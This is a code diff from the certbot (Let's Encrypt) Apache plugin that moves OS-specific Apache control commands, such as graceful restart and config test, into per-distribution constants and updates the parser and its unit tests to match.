+    vhost_files="*.conf",
     version_cmd=['apachectl', '-v'],
     define_cmd=['apachectl', '-t', '-D', 'DUMP_RUN_CFG'],
+    restart_cmd=['apachectl', 'graceful'],
+    conftest_cmd=['apachectl', 'configtest'],
     enmod=None,
     dismod=None,
     le_vhost_ext="-le-ssl.conf",
@@ -32,9 +36,11 @@
 CLI_DEFAULTS_GENTOO = dict(
     server_root="/etc/apache2",
     vhost_root="/etc/apache2/vhosts.d",
-    ctl="apache2ctl",
+    vhost_files="*.conf",
     version_cmd=['/usr/sbin/apache2', '-v'],
     define_cmd=['/usr/sbin/apache2', '-t', '-D', 'DUMP_RUN_CFG'],
+    restart_cmd=['apache2ctl', 'graceful'],
+    conftest_cmd=['apache2ctl', 'configtest'],
     enmod=None,
     dismod=None,
     le_vhost_ext="-le-ssl.conf",
diff --git a/letsencrypt-apache/letsencrypt_apache/parser.py b/letsencrypt-apache/letsencrypt_apache/parser.py
index 12704c859b6..593c807cccd 100644
--- a/letsencrypt-apache/letsencrypt_apache/parser.py
+++ b/letsencrypt-apache/letsencrypt_apache/parser.py
@@ -28,7 +28,7 @@ class ApacheParser(object):
     arg_var_interpreter = re.compile(r"\$\{[^ \}]*}")
     fnmatch_chars = set(["*", "?", "\\", "[", "]"])
 
-    def __init__(self, aug, root, vhostroot, ctl, version=(2, 4)):
+    def __init__(self, aug, root, vhostroot, version=(2, 4)):
         # Note: Order is important here.
 
         # This uses the binary, so it can be done first.
@@ -37,7 +37,7 @@ def __init__(self, aug, root, vhostroot, ctl, version=(2, 4)):
         # This only handles invocation parameters and Define directives!
         self.variables = {}
         if version >= (2, 4):
-            self.update_runtime_variables(ctl)
+            self.update_runtime_variables()
 
         self.aug = aug
         # Find configuration root and make sure augeas can parse it.
@@ -60,9 +60,10 @@ def __init__(self, aug, root, vhostroot, ctl, version=(2, 4)):
         self.loc.update(self._set_locations())
 
         # Must also attempt to parse virtual host root
-        self._parse_file(self.vhostroot + "/*.conf")
+        self._parse_file(self.vhostroot + "/" +
+                         constants.os_constant("vhost_files"))
 
-        #check to see if there were unparsed define statements
+        # check to see if there were unparsed define statements
         if version < (2, 4):
             if self.find_dir("Define", exclude=False):
                 raise errors.PluginError("Error parsing runtime variables")
@@ -91,7 +92,7 @@ def init_modules(self):
             self.modules.add(
                 os.path.basename(self.get_arg(match_filename))[:-2] + "c")
 
-    def update_runtime_variables(self, ctl):
+    def update_runtime_variables(self):
         """"
 
         .. note:: Compile time variables (apache2ctl -V) are not used within the
@@ -101,7 +102,7 @@ def update_runtime_variables(self, ctl):
         .. todo:: Create separate compile time variables... simply for arg_get()
 
         """
-        stdout = self._get_runtime_cfg(ctl)
+        stdout = self._get_runtime_cfg()
 
         variables = dict()
         matches = re.compile(r"Define: ([^ \n]*)").findall(stdout)
@@ -121,7 +122,7 @@ def update_runtime_variables(self, ctl):
 
         self.variables = variables
 
-    def _get_runtime_cfg(self, ctl):  # pylint: disable=no-self-use
+    def _get_runtime_cfg(self):  # pylint: disable=no-self-use
         """Get runtime configuration info.
 
         :returns: stdout from DUMP_RUN_CFG
@@ -136,9 +137,11 @@ def _get_runtime_cfg(self, ctl):  # pylint: disable=no-self-use
 
         except (OSError, ValueError):
             logger.error(
-                "Error accessing %s for runtime parameters!%s", ctl, os.linesep)
+                "Error running command %s for runtime parameters!%s",
+                constants.os_constant("define_cmd"), os.linesep)
             raise errors.MisconfigurationError(
-                "Error accessing loaded Apache parameters: %s", ctl)
+                "Error accessing loaded Apache parameters: %s",
+                constants.os_constant("define_cmd"))
         # Small errors that do not impede
         if proc.returncode != 0:
             logger.warn("Error in checking parameter list: %s", stderr)
diff --git a/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py b/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py
index 63eb5c783ae..289b61bb13f 100644
--- a/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py
+++ b/letsencrypt-apache/letsencrypt_apache/tests/constants_test.py
@@ -11,14 +11,17 @@ class ConstantsTest(unittest.TestCase):
     @mock.patch("letsencrypt.le_util.get_os_info")
     def test_get_debian_value(self, os_info):
         os_info.return_value = ('Debian', '', '')
-        self.assertEqual(constants.os_constant("ctl"), "apache2ctl")
+        self.assertEqual(constants.os_constant("vhost_root"),
+                         "/etc/apache2/sites-available")
 
     @mock.patch("letsencrypt.le_util.get_os_info")
     def test_get_centos_value(self, os_info):
         os_info.return_value = ('CentOS Linux', '', '')
-        self.assertEqual(constants.os_constant("ctl"), "apachectl")
+        self.assertEqual(constants.os_constant("vhost_root"),
+                         "/etc/httpd/conf.d")
 
     @mock.patch("letsencrypt.le_util.get_os_info")
     def test_get_default_value(self, os_info):
         os_info.return_value = ('Nonexistent Linux', '', '')
-        self.assertEqual(constants.os_constant("ctl"), "apache2ctl")
+        self.assertEqual(constants.os_constant("vhost_root"),
+                         "/etc/apache2/sites-available")
diff --git a/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py b/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
index 023b3990a57..b871f89b7a7 100644
--- a/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
+++ b/letsencrypt-apache/letsencrypt_apache/tests/parser_test.py
@@ -145,24 +145,26 @@ def test_update_runtime_variables(self, mock_cfg):
         expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443",
                          "example_path": "Documents/path"}
 
-        self.parser.update_runtime_variables("ctl")
+        self.parser.update_runtime_variables()
         self.assertEqual(self.parser.variables, expected_vars)
 
     @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg")
     def test_update_runtime_vars_bad_output(self, mock_cfg):
         mock_cfg.return_value = "Define: TLS=443=24"
-        self.parser.update_runtime_variables("ctl")
+        self.parser.update_runtime_variables()
 
         mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24"
         self.assertRaises(
-            errors.PluginError, self.parser.update_runtime_variables, "ctl")
+            errors.PluginError, self.parser.update_runtime_variables)
 
+    @mock.patch("letsencrypt_apache.constants.os_constant")
     @mock.patch("letsencrypt_apache.parser.subprocess.Popen")
-    def test_update_runtime_vars_bad_ctl(self, mock_popen):
+    def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const):
         mock_popen.side_effect = OSError
+        mock_const.return_value = "nonexistent"
         self.assertRaises(
             errors.MisconfigurationError,
-            self.parser.update_runtime_variables, "ctl")
+            self.parser.update_runtime_variables)
 
     @mock.patch("letsencrypt_apache.parser.subprocess.Popen")
     def test_update_runtime_vars_bad_exit(self, mock_popen):
@@ -170,7 +172,7 @@ def test_update_runtime_vars_bad_exit(self, mock_popen):
         mock_popen.returncode = -1
         self.assertRaises(
             errors.MisconfigurationError,
-            self.parser.update_runtime_variables, "ctl")
+            self.parser.update_runtime_variables)
 
 
 class ParserInitTest(util.ApacheTest):
@@ -191,7 +193,7 @@ def test_unparsable(self, mock_cfg):
         self.assertRaises(
             errors.PluginError, ApacheParser, self.aug,
             os.path.relpath(self.config_path),
-            "/dummy/vhostpath", "ctl", version=(2, 2, 22))
+            "/dummy/vhostpath", version=(2, 2, 22))
 
     def test_root_normalized(self):
         from letsencrypt_apache.parser import ApacheParser
@@ -203,7 +205,7 @@ def test_root_normalized(self):
                 "debian_apache_2_4/////two_vhost_80/../two_vhost_80/apache2")
 
             parser = ApacheParser(self.aug, path,
-                                  "/dummy/vhostpath", "dummy_ctl")
+                                  "/dummy/vhostpath")
 
         self.assertEqual(parser.root, self.config_path)
 
@@ -213,7 +215,7 @@ def test_root_absolute(self):
                         "update_runtime_variables"):
             parser = ApacheParser(
                 self.aug, os.path.relpath(self.config_path),
-                "/dummy/vhostpath", "dummy_ctl")
+                "/dummy/vhostpath")
 
         self.assertEqual(parser.root, self.config_path)
 
@@ -223,7 +225,7 @@ def test_root_no_trailing_slash(self):
                         "update_runtime_variables"):
             parser = ApacheParser(
                 self.aug, self.config_path + os.path.sep,
-                "/dummy/vhostpath", "dummy_ctl")
+                "/dummy/vhostpath")
 
         self.assertEqual(parser.root, self.config_path)
 
diff --git a/letsencrypt-apache/letsencrypt_apache/tests/util.py b/letsencrypt-apache/letsencrypt_apache/tests/util.py
index 95c95e6a9bb..798d4814b60 100644
--- a/letsencrypt-apache/letsencrypt_apache/tests/util.py
+++ b/letsencrypt-apache/letsencrypt_apache/tests/util.py
@@ -58,7 +58,7 @@ def setUp(self, test_dir="debian_apache_2_4/two_vhost_80",
         with mock.patch("letsencrypt_apache.parser.ApacheParser."
                         "update_runtime_variables"):
             self.parser = ApacheParser(
-                self.aug, self.config_path, self.vhost_path, "dummy_ctl_path")
+                self.aug, self.config_path, self.vhost_path)
 
 
 def get_apache_configurator(
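The constants_test.py changes above exercise the lookup that the rest of the diff leans on: `constants.os_constant(key)` returns the value for the distribution reported by `letsencrypt.le_util.get_os_info()`, falling back to the Debian defaults for unknown platforms. Below is a minimal sketch of that lookup with the table trimmed to two distributions; the exact matching and fallback logic is an assumption inferred from those tests, not copied from the real module.

```python
# Simplified sketch of the per-OS constant lookup; the real implementation
# lives in letsencrypt_apache.constants and may differ in detail.
from letsencrypt import le_util

_CLI_DEFAULTS = {
    "debian": dict(
        vhost_root="/etc/apache2/sites-available",
        restart_cmd=['apache2ctl', 'graceful'],
        conftest_cmd=['apache2ctl', 'configtest'],
    ),
    "centos linux": dict(
        vhost_root="/etc/httpd/conf.d",
        restart_cmd=['apachectl', 'graceful'],
        conftest_cmd=['apachectl', 'configtest'],
    ),
}


def os_constant(key):
    """Return the OS-specific value for ``key``, defaulting to Debian."""
    # get_os_info() returns a tuple such as ('Debian', '', ''), per the tests.
    os_name = le_util.get_os_info()[0].lower()
    defaults = _CLI_DEFAULTS.get(os_name, _CLI_DEFAULTS["debian"])
    return defaults[key]
```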
Fix to enable us to support a broader range of configuration schemes - some of which are OS defaults - and to abstract the remaining hardcoded but still OS-dependent values. Fixes #2034
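Seen from the configurator's side, the practical effect is that reloading Apache and running the configuration test no longer depend on a user-supplied `--ctl` path; both commands come from the OS constant table. The sketch below is a hypothetical standalone illustration of that call pattern: in the plugin the equivalent calls live inside `ApacheConfigurator._reload()` and `config_test()`, and the `reload_apache`/`check_config` names here are made up for the example.

```python
from letsencrypt import errors, le_util
from letsencrypt_apache import constants


def reload_apache():
    # 'restart_cmd' resolves to e.g. ['apache2ctl', 'graceful'] on Debian
    # or ['apachectl', 'graceful'] on CentOS.
    try:
        le_util.run_script(constants.os_constant("restart_cmd"))
    except errors.SubprocessError as err:
        raise errors.MisconfigurationError(str(err))


def check_config():
    # 'conftest_cmd' resolves to e.g. ['apache2ctl', 'configtest'].
    try:
        le_util.run_script(constants.os_constant("conftest_cmd"))
    except errors.SubprocessError as err:
        raise errors.MisconfigurationError(str(err))
```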
https://api.github.com/repos/certbot/certbot/pulls/2038
2015-12-28T12:31:15Z
2016-01-03T01:45:51Z
2016-01-03T01:45:51Z
2016-05-06T19:22:24Z
3,488
certbot/certbot
1,158